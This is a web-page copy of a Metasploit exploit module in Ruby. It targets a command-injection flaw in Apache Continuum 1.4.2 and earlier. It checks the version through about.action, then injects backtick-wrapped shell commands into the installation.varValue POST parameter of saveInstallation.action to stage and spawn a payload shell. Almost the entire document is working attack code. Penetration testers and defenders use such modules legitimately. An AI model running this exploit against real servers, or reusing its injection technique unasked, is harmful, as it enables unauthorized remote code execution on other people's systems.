Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Apache Continuum Arbitrary Command Execution',

17
        'Description' => %q{

18
          This module exploits a command injection in Apache Continuum <= 1.4.2.

19
          By injecting a command into the installation.varValue POST parameter to

20
          /continuum/saveInstallation.action, a shell can be spawned.

21
        },

22
        'Author' => [

23
          'David Shanahan', # Proof of concept

24
          'wvu'             # Metasploit module

25
        ],

26
        'References' => [

27
          %w{EDB 39886}

28
        ],

29
        'DisclosureDate' => '2016-04-06',

30
        'License' => MSF_LICENSE,

31
        'Platform' => 'linux',

32
        'Arch' => [ARCH_X86, ARCH_X64],

33
        'Privileged' => false,

34
        'Targets' => [

35
          ['Apache Continuum <= 1.4.2', {}]

36
        ],

37
        'DefaultTarget' => 0,

38
        'Notes' => {

39
          'Reliability' => UNKNOWN_RELIABILITY,

40
          'Stability' => UNKNOWN_STABILITY,

41
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

42
        }

43
      )

44
    )

45


46
    register_options([

47
      Opt::RPORT(8080)

48
    ])

49
  end

50


51
  def check

52
    res = send_request_cgi(

53
      'method' => 'GET',

54
      'uri' => '/continuum/about.action'

55
    )

56


57
    if res && res.body.include?('1.4.2')

58
      CheckCode::Appears

59
    elsif res && res.code == 200

60
      CheckCode::Detected

61
    else

62
      CheckCode::Safe

63
    end

64
  end

65


66
  def exploit

67
    print_status('Injecting CmdStager payload...')

68
    execute_cmdstager

69
  end

70


71
  def execute_command(cmd, opts = {})

72
    send_request_cgi(

73
      'method' => 'POST',

74
      'uri' => '/continuum/saveInstallation.action',

75
      'vars_post' => {

76
        'installation.name' => Rex::Text.rand_text_alpha(8),

77
        'installation.type' => 'jdk',

78
        'installation.varValue' => '`' + cmd + '`'

79
      }

80
    )

81
  end

82
end

83


84